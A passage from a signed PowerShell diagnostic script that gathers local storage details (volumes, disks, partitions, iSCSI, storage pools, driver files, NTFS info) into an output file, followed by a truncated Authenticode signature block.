$items = @('AddMountPoint', 'Chkdsk', 'Defrag', 'DefragAnalysis', 'Dismount', 'Format', 'Mount', 'Reset', 'SetPowerState', 'Access', 'Automount', 'Availability', 'BlockSize', 'BootVolume', 'Capacity', 'Caption', 'Compressed', 'ConfigManagerErrorCode', 'ConfigManagerUserConfig', 'CreationClassName', 'Description', 'DeviceID', 'DirtyBitSet', 'DriveLetter', 'DriveType', 'ErrorCleared', 'ErrorDescription', 'ErrorMethodology', 'FileSystem', 'FreeSpace', 'IndexingEnabled', 'InstallDate', 'Label', 'LastErrorCode', 'MaximumFileNameLength', 'Name', 'NumberOfBlocks', 'PageFilePresent', 'PNPDeviceID', 'PowerManagementCapabilities', 'PowerManagementSupported', 'Purpose', 'QuotasEnabled', 'QuotasIncomplete', 'QuotasRebuilding', 'SerialNumber', 'Status', 'StatusInfo', 'SupportsDiskQuotas', 'SupportsFileBasedCompression', 'SystemCreationClassName', 'SystemVolume')
Get-CimInstance Win32_Volume | Format-List $items -GroupBy DeviceID | Out-File -FilePath $OutputFile -Append
# ============================================= #
# iSCSI Information
# ============================================= #
'==============================================' | Out-File -FilePath $OutputFile -Append
'iSCSI Information' | Out-File -FilePath $OutputFile -Append
'==============================================' | Out-File -FilePath $OutputFile -Append
$MSiSCSI = Get-Service -Name MSiSCSI -ErrorAction SilentlyContinue
if($MSiSCSI)
{
"`n" | Out-File -FilePath $OutputFile -Append
"{0} is {1}" -f $MSiSCSI.DisplayName, $MSiSCSI.Status | Out-File -FilePath $OutputFile -Append
"`n" | Out-File -FilePath $OutputFile -Append
}
}
else
{
# ============================================= #
# Disk Information
# ============================================= #
'==============================================' | Out-File -FilePath $OutputFile -Append
'Disk Information' | Out-File -FilePath $OutputFile -Append
'==============================================' | Out-File -FilePath $OutputFile -Append
Get-Disk -ErrorAction SilentlyContinue | Select-Object * -ExcludeProperty CimSystemProperties, CimInstanceProperties, CimClass, PSComputerName, Path, PassThroughServer, PassThroughNamespace, PassThroughIds, PassThroughClass, ObjectId, UniqueIdFormat |
Format-List -GroupBy BusType | Out-File -FilePath $OutputFile -Append
# ============================================= #
# Volume Information
# ============================================= #
'==============================================' | Out-File -FilePath $OutputFile -Append
'Volume Information' | Out-File -FilePath $OutputFile -Append
'==============================================' | Out-File -FilePath $OutputFile -Append
"`n" | Out-File -FilePath $OutputFile -Append
$volumes = Get-Volume -ErrorAction SilentlyContinue
"Total Volume(s) : $($volumes.Count)" | Out-File -FilePath $OutputFile -Append
$volumes | Select-Object * -ExcludeProperty CimSystemProperties, CimInstanceProperties, CimClass, PSComputerName, Path, PassThroughServer, PassThroughNamespace, PassThroughIds, PassThroughClass, ObjectId, UniqueId |
Format-List -GroupBy DriveType | Out-File -FilePath $OutputFile -Append
# ============================================= #
# Partition Information
# ============================================= #
'==============================================' | Out-File -FilePath $OutputFile -Append
'Partition Information' | Out-File -FilePath $OutputFile -Append
'==============================================' | Out-File -FilePath $OutputFile -Append
"`n" | Out-File -FilePath $OutputFile -Append
$partitions = Get-Partition -ErrorAction SilentlyContinue
"Total Partition(s) : $($partitions.Count)" | Out-File -FilePath $OutputFile -Append
$partitions | Select-Object * -ExcludeProperty CimSystemProperties, CimInstanceProperties, CimClass, PSComputerName, Path, PassThroughServer, PassThroughNamespace, PassThroughIds, PassThroughClass, ObjectId, UniqueId |
Format-List -GroupBy DiskNumber | Out-File -FilePath $OutputFile -Append
# ============================================= #
# iSCSI Information
# ============================================= #
'==============================================' | Out-File -FilePath $OutputFile -Append
'iSCSI Information' | Out-File -FilePath $OutputFile -Append
'==============================================' | Out-File -FilePath $OutputFile -Append
$MSiSCSI = Get-Service -Name MSiSCSI -ErrorAction SilentlyContinue
if($MSiSCSI)
{
"`n" | Out-File -FilePath $OutputFile -Append
"{0} is {1}" -f $MSiSCSI.DisplayName, $MSiSCSI.Status | Out-File -FilePath $OutputFile -Append
}
if($MSiSCSI.Status -eq 'Running')
{
Get-IscsiTarget | Format-List | Out-File -FilePath $OutputFile -Append
Get-IscsiTargetPortal | Format-List | Out-File -FilePath $OutputFile -Append
"`n" | Out-File -FilePath $OutputFile -Append
'Initiator Ports' | Out-File -FilePath $OutputFile -Append
'---------------' | Out-File -FilePath $OutputFile -Append
Get-InitiatorPort | Format-Table -AutoSize | Out-File -FilePath $OutputFile -Append
}
else
{
"`n" | Out-File -FilePath $OutputFile -Append
}
# ============================================= #
# Storage Subsystem
# ============================================= #
'==============================================' | Out-File -FilePath $OutputFile -Append
'Storage Subsystem' | Out-File -FilePath $OutputFile -Append
'==============================================' | Out-File -FilePath $OutputFile -Append
Get-StorageSubsystem -ErrorAction SilentlyContinue | Select-Object * -ExcludeProperty CimSystemProperties, CimInstanceProperties, CimClass, PSComputerName, Path, PassThroughServer, PassThroughNamespace, PassThroughIds, PassThroughClass, ObjectId, UniqueId |
Format-List | Out-File -FilePath $OutputFile -Append
'==============================================' | Out-File -FilePath $OutputFile -Append
'Storage Pool' | Out-File -FilePath $OutputFile -Append
'==============================================' | Out-File -FilePath $OutputFile -Append
Get-StoragePool | Select-Object * -ExcludeProperty CimSystemProperties, CimInstanceProperties, CimClass, PSComputerName, Path, PassThroughServer, PassThroughNamespace, PassThroughIds, PassThroughClass, ObjectId, UniqueId |
Format-List | Out-File -FilePath $OutputFile -Append
}
# ============================================= #
# Properties of Important Drivers
# ============================================= #
'StorPort.sys', 'ScsiPort.sys', 'Classpnp.sys', 'Mountmgr.sys', 'VolSnap.sys', 'Ntfs.sys', 'PartMgr.sys', 'SpacePort.sys' | ForEach-Object {
'==============================================' | Out-File -FilePath $OutputFile -Append
"$_ Service Properties" | Out-File -FilePath $OutputFile -Append
'==============================================' | Out-File -FilePath $OutputFile -Append
Get-ItemProperty -Path "$env:windir\System32\drivers\$_" -ErrorAction SilentlyContinue | Format-List -Property Name, Length, Mode, VersionInfo, LinkType, Target, CreationTime, LastWriteTime, LastAccessTime |
Out-File -FilePath $OutputFile -Append}
# ============================================= #
# NTFS Information
# ============================================= #
'==============================================' | Out-File -FilePath $OutputFile -Append
'NTFS Information' | Out-File -FilePath $OutputFile -Append
'==============================================' | Out-File -FilePath $OutputFile -Append
"`n" | Out-File -FilePath $OutputFile -Append
[System.IO.DriveInfo]::GetDrives() | Where-Object {$_.DriveFormat -eq 'NTFS'} | Select-Object Name |
ForEach-Object {
"Volume {0} `n`n" -f $_.Name | Out-File -FilePath $OutputFile -Append
FSUTIL fsinfo ntfsInfo ($_.Name) | Out-File -FilePath $OutputFile -Append
"`n" | Out-File -FilePath $OutputFile -Append }
"`n" | Out-File -FilePath $OutputFile -Append
CollectFiles -filesToCollect $OutputFile -fileDescription $fileDescription -SectionDescription $sectionDescription
# SIG # Begin signature block
# MIIoOQYJKoZIhvcNAQcCoIIoKjCCKCYCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCoZYf+QYWxL3dG
# 7aRbdboIEI0dtSSHrEMio6I/snj6cKCCDYUwggYDMIID66ADAgECAhMzAAAEA73V
# lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV
# LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY
# oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi
# kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/
# /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv
# ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw
# VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh
# dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW
# gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw
# MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx
# XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB
# AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r
# EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV
# NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC
# rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos
# oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB
# +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO
# raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+
# sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W
# +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s
# IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu
# iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK
# YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm
# aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw
# OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD
# VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG
# 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la
# UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc
# 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D
# dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+
# lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk
# kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6
# A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd
# X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL
# 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd
# sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3
# T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS
# 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI
# bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL
# BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD
# uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv
# c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF
# BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h
# cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA
# YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn
# 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7
# v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b
# pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/
# KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy
# CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp
# mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi
# hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb
# BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS
# oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL
# gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX
# cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4x
# CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
# b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p
# Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA
# BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw
# HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIIQA
# 2rAj28cmDpcZvuTQhxuVPxRDgBUojURy9PPqVlFsMEIGCisGAQQBgjcCAQwxNDAy
# oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20wDQYJKoZIhvcNAQEBBQAEggEAhinhxpmfZWWl9Jt5ApySm7GytbmgW2lGVJxD
# peYXmFTTCxnj1CVmRec7lPYGzz8/5t6J0FF+Q4y+YRkB9s5LBEEvSkWzgT2I+TTT
# wyXqyf80TUuktGJuky1ESj4Sp6PK36cv4oNqCn4pQoPDlAul0SLDIsdElpVoMwQb
# utjq0XS8KLym62jx8S6tOPuXQSSOr6V30T8J15wwvul5ME6vZMNZUc+Du0IGCX78
# 1aBM0vw/BMKOhnxjFxgiBBwrfVZpnJRsvZ39R0s4vfxCDN5giDr5wkqe3gnmzfCc
# 9t2Qv6XdXZg4VN73Aycug85+paSHuMkOy9O4qwdUmLA0lRnq/6GCF5QwgheQBgor
# BgEEAYI3AwMBMYIXgDCCF3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZI
# AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE
# WQoDATAxMA0GCWCGSAFlAwQCAQUABCBqi+FNf8GeccTcvReu3LszbncNMhF7HP83
# C5vGeUvwWgIGZxqBxlgYGBMyMDI0MTAyODExNDA0My4xNTdaMASAAgH0oIHRpIHO
# MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL
# ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk
# IFRTUyBFU046REMwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l
# LVN0YW1wIFNlcnZpY2WgghHqMIIHIDCCBQigAwIBAgITMwAAAehQsIDPK3KZTQAB
# AAAB6DANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx
# MDAeFw0yMzEyMDYxODQ1MjJaFw0yNTAzMDUxODQ1MjJaMIHLMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l
# cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046REMwMC0w
# NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw
# ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDhQXdE0WzXG7wzeC9SGdH6
# eVwdGlF6YgpU7weOFBkpW9yuEmJSDE1ADBx/0DTuRBaplSD8CR1QqyQmxRDD/Cdv
# DyeZFAcZ6l2+nlMssmZyC8TPt1GTWAUt3GXUU6g0F0tIrFNLgofCjOvm3G0j482V
# utKS4wZT6bNVnBVsChr2AjmVbGDN/6Qs/EqakL5cwpGel1te7UO13dUwaPjOy0Wi
# 1qYNmR8i7T1luj2JdFdfZhMPyqyq/NDnZuONSbj8FM5xKBoar12ragC8/1CXaL1O
# MXBwGaRoJTYtksi9njuq4wDkcAwitCZ5BtQ2NqPZ0lLiQB7O10Bm9zpHWn9x1/Hm
# dAn4koMWKUDwH5sd/zDu4vi887FWxm54kkWNvk8FeQ7ZZ0Q5gqGKW4g6revV2IdA
# xBobWdorqwvzqL70WdsgDU/P5c0L8vYIskUJZedCGHM2hHIsNRyw9EFoSolDM+yC
# edkz69787s8nIp55icLfDoKw5hak5G6MWF6d71tcNzV9+v9RQKMa6Uwfyquredd5
# sqXWCXv++hek4A15WybIc6ufT0ilazKYZvDvoaswgjP0SeLW7mvmcw0FELzF1/uW
# aXElLHOXIlieKF2i/YzQ6U50K9dbhnMaDcJSsG0hXLRTy/LQbsOD0hw7FuK0nmzo
# tSx/5fo9g7fCzoFjk3tDEwIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFPo5W8o980kM
# fRVQba6T34HwelLaMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G
# A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv
# Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs
# BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0
# LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy
# MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH
# AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCWfcJm2rwXtPi7
# 4km6PKAkni9+BWotq+QtDGgeT5F3ro7PsIUNKRkUytuGqI8thL3Jcrb03x6DOppY
# JEA+pb6o2qPjFddO1TLqvSXrYm+OgCLL+7+3FmRmfkRu8rHvprab0O19wDbukgO8
# I5Oi1RegMJl8t5k/UtE0Wb3zAlOHnCjLGSzP/Do3ptwhXokk02IvD7SZEBbPboGb
# tw4LCHsT2pFakpGOBh+ISUMXBf835CuVNfddwxmyGvNSzyEyEk5h1Vh7tpwP7z7r
# J+HsiP4sdqBjj6Avopuf4rxUAfrEbV6aj8twFs7WVHNiIgrHNna/55kyrAG9Yt19
# CPvkUwxYK0uZvPl2WC39nfc0jOTjivC7s/IUozE4tfy3JNkyQ1cNtvZftiX3j5Dt
# +eLOeuGDjvhJvYMIEkpkV68XLNH7+ZBfYa+PmfRYaoFFHCJKEoRSZ3PbDJPBiEhZ
# 9yuxMddoMMQ19Tkyftot6Ez0XhSmwjYBq39DvBFWhlyDGBhrU3GteDWiVd9YGSB2
# WnxuFMy5fbAK6o8PWz8QRMiptXHK3HDBr2wWWEcrrgcTuHZIJTqepNoYlx9VRFvj
# /vCXaAFcmkW1nk7VE+owaXr5RJjryDq9ubkyDq1mdrF/geaRALXcNZbfNXIkhXzX
# A6a8CiamcQW/DgmLJpiVQNriZYCHIDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb
# SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI
# EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv
# ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj
# YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy
# NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT
# B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE
# AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB
# AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI
# yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo
# YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y
# aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v
# 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG
# ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS
# kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr
# bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM
# jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL
# W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF
# emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu
# rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE
# FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn
# G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW
# M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5
# Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi
# AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV
# 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js
# Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx
# MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2
# LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv
# 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn
# OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1
# bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4
# rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU
# 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF
# NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/
# HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU
# CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi
# excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm
# dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq
# ELQdVTNYs6FwZvKhggNNMIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp
# Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkRDMDAtMDVF
# MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK
# AQEwBwYFKw4DAhoDFQCMJG4vg0juMOVn2BuKACUvP80FuqCBgzCBgKR+MHwxCzAJ
# BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k
# MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv
